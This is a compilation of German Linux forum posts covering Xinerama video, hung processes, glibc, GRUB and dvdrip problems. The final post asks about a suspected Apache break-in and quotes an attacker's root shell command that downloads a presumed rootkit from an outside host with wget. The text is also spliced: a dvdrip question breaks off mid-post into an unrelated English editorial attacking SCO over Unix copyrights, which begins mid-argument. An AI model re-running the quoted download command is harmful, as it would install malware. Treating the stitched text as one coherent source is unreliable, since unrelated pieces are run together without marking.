Hallo Ich habe ein Problem mit der Darstellung eines Videobildes: Ich verwende Suse Linux 8.0 professional und arbeite mit zwei Monitoren (Samsung SyncMaster 191T). Die Monitore sind an einer GeForce 4 Ti4600 Grafikkarte angeschlossen. Einer am VGA-Anschluss , der andere am DVI Anschluss. Den Bildschirm füge ich mittels Xinerama zu einem Desktop zusammen. Mittels zweier WinTV Go Karten lese ich zwei Videobilder in eine Anwendung ein. Nun mein Problem: Die Ausgabe der Videobilder erfolgt nur auf einem Monitor. Schiebe ich das Videofenster auf den andern Monitor, verschwinden die Videobilder. Schieb ich das Fenster wieder zurück, sind die Bilder wieder da. Wer kann mir helfen ???? Rafael

Auf dem Rechner lauft selbstcomplierter 2.4.18 auf gewohnlicher Hardware. Etwas aussergewoehnlich ist nur ein Mylex DAC960 SCSI-RAID Controller an dem 4 IBM-Platten als RAID-5 laufen. Kann mir einer sagen was diesen Meldungen bedeuten? Was "kaputt ist"? Was ich ersetzten/ neu machen sollte? Prozesse lassen sich nicht toeten

Hallo zusammen, ich habe seit heute das Problem, das Prozesse haengen bleiben, sie sich aber auch nicht durch ein kill (-9) abwuergen lassen. Probleme gibts irgendwie mit der VMWare - davon betroffen sind aber auch mal gdm, ifconfig oder netstat. Da die Prozesse sich nicht beednen lassen, kann ich auch nicht rebooten. Any hints? Zufriff auf manpages

Hallo, bei einem Wetter wie heute lese ich am liebsten meine mails auf der Terasse. Hier steht mir aber nur eine Notebookpartition von 500 MB zur Verfuegung und es laeuft woody ohne X. Auf meinem Server (P200/40 GB Platte) laeuft doc-central (auch woody ohne X). Meine normale Workstation (Athlon 1,4//230 GB, woody mit allem was ich so brauche) ist jetzt aus. Beim mail lesen wuerde ich ab und an gern was in manpages nachschlagen, die weder auf dem Laptop noch auf dem Server installiert sind. Obwohl die Serverplatte recht gross ist, halte ich die Idee dort z.B. Videobearbeitungssoftware zu installieren nur um per doc-central an dessen Doku hier auf dem Laptop zu kommen, fuer nicht grad optimal :(. apt-cache search man | less hat mich nicht weiter gebracht :(. Kann ich einfach das wohl umfangreichste manpage Verzeichnis von der Workstation auf den Server kopieren ohne mit dem Paketsystem zu kollidieren? Falls da nichts gegen spricht, hatte ich an eine rsync initscript auf der Workstation gedacht, habe mich aber vielleicht irgendwie verrannt ... so, any hints welcome. TIA. -- bye maik

transcode/dvdrip

Wenn ich nun versuche über dvdrip die DVD einzulesen bekomme ich folgene Fehlermeldung: tcprobe: error while loading shared libraries: libquicktime.so.1: cannot open shared object file: No such file or directory Google etc sagt, dass diese im Paket libquicktime1 enthalten ist. Ich habe aber das Paket libquicktime1 installiert. But we never dreamed of the big lie behind it. This morning, Novell announced some of the terms of the company's 1995 agreement to sell its Unix business to SCO. The shocking news is that Novell did not sell the Unix intellectual property to SCO. Instead, they sold SCO a license to develop, sell, and sub-license Unix. The title to Unix copyrights and patents remains with Novell. To back up this assertion, Novell refers to public records at the Library of Congress Copyright Office and the U.S. Patent Office. In their announcement, Novell refers to recent letters from SCO asking Novell to assign the Unix copyrights to SCO. So, apparently SCO's management team knew that they did not own Unix while pursuing their sham campaign against Linux. Along with this revelation, Novell is reiterating its support of the Linux and Open Source developer community, and its status as a partner in that community. Novell rejects SCO's accusations of plagarism. Novell management says they do not intend to stand in the way of the development of the Linux kernel, its companion GNU system, and other Free Software. It would be an understatement to say that this leaves SCO in a bad position. The company has loudly and repeatedly asserted that they were the owner of the Unix intellectual property, all of the way back to AT&T's original development of the system 30 years ago. They've lied to their stockholders, their customers and partners, the 1500 companies that they threatened, the press, and the public. Their untruthful campaign caused the loss of sales and jobs, and damaged Linux companies and developers in a myriad of ways. And now, SCO will be the lawsuit target. SCO's first quarterly earnings conference call is this morning, at 9 AM MST (11 AM EST, 8 AM PST). Call 800-406-5356, toll-free, to participate. You might even get to ask a question. It should be fun to watch them try to weasel out of this one. Microsoft executives also have egg on their faces. The company self-servingly rushed to buy an SCO license one business day after the threat letter, bringing a senior attorney to the office on a Sunday to tell the press how much Microsoft "values intellectual property." Microsoft's management could have taken the time to analyze SCO's claims, if the company had wanted this license for practical and technical reasons. Their decision to buy when they did must have been motivated by a desire to add to SCO's fear campaign. Of course they'll grab any opportunity to spread fear about Linux, but this time Microsoft bought a pig in a poke. SCO management, if they insist on standing in the way of a train, could still claim that software they developed in the years since 1995 is being infringed by the Open Source developers. That claim, always a dubious one, will be difficult to take seriously now that their prevarication throughout this campaign has come to light. SCO would be well advised to drop their suit against IBM in exchange for IBM's agreement not to counter-sue. But IBM might not feel that charitable toward SCO. In contrast to SCO, Novell's made a friend among the Free Software developers. We're always happy to see people using our software. But a real partnership between an IT vendor and our community is an equal partnership, with the company donating services and new software in exchange for the value it receives. Novell has already placed important software under Open Source licenses. Today, the company has done us a tremendous service, by stomping upon an obnoxious parasite. --

DDS2 SCSI Tape - Reinigungsband

Tach zusammen, hab' noch nie mit DAT Laufwerken in Kombination mit Reinigungsbändern zu tun gehabt. Was mach ich, wenn ich so ein Band unter Linxux einsetzen will um mein DDS2 Laufwerk zu reinigen? Zwei glibc parallel?

Hallo alle, ich habe hier ein echtes Problem: ich verwende eine SuSE 8.1 mit glibc 2.2.5, habe jedoch ein Software, die glibc 2.3.2 benötigt.. Leider ist es nicht möglich, über den SuSE ftp-server eine entsprechende Version für die SuSE 8.1 zu bekommen. Wäre es möglich, die aktuelle Version selbst zu compilieren und zwei Versionen parallel zu verwenden? Und welche Vorraussetzungen sollten erfüllt sein, um sie zu compilieren? Problem mit dem booten von Linux per GRUB!

Hallo, ich habe zum testen einmal RedHat 9 auf die erste Partion meiner dritten Festplatte installiert (20 GB Partion) und habe dann schon beim installieren die Meldung bekommen das es beim booten Probleme geben würde. Die Bootloader Installation habe ich übersprungen da ich von der Partion mit einem schon bestehenden GRUB booten möchte. Dazu habe ich in meine GRUB Konfiguration die folgenden Zeilen eingefügt: title Red Hat Linux 9 root (hd2,0) kernel /boot/vmlinux-2.4.20-8 ro root=/dev/hdh1 hdc=ide-scsi vga=0x318 Wenn ich dann versuche diese zu booten bekomme ich die folgende Fehlermeldung: "Error 13: Invalid or unsupported executable format" Mit der bei der Installation erstellten Bootdiskette kann ich ohne Probleme von RedHat 9 mit dieser Partion starten. Woran kann das liegen ? Bye, Henning

Apache Bug?

Tag, gibt es einen neuen Apache-Bug der root-Exploits ermöglicht? Ein Bekannter hat folgende Einträge im Log gefunden: a.b.c.d - - [26/May/2003:20:06:31 +0200] "T¡¬ôG^~Fgí±D1Mj×}äù<G<" 501 - IP mal aus Datenschutzgründen geändert... Er benutzt zur Zeit aktuelle Releases und hat ähnliche Zeilen auf mehreren Rechnern gefunden und in der .bash_history von root ungefähr folgende Zeilen die auf die Installation eines Root-Kit hindeuten: wget jhony.home.ro/aha ftp ftp.home.ro Evtl. ist auch ein anderer Dienst der Einstiegspunkt, z. Zt. können wir das nicht genau ermitteln. Hat jemand ähnliches gesichtet? Neuer Wurm im Umlauf o.ä.? bye Markus
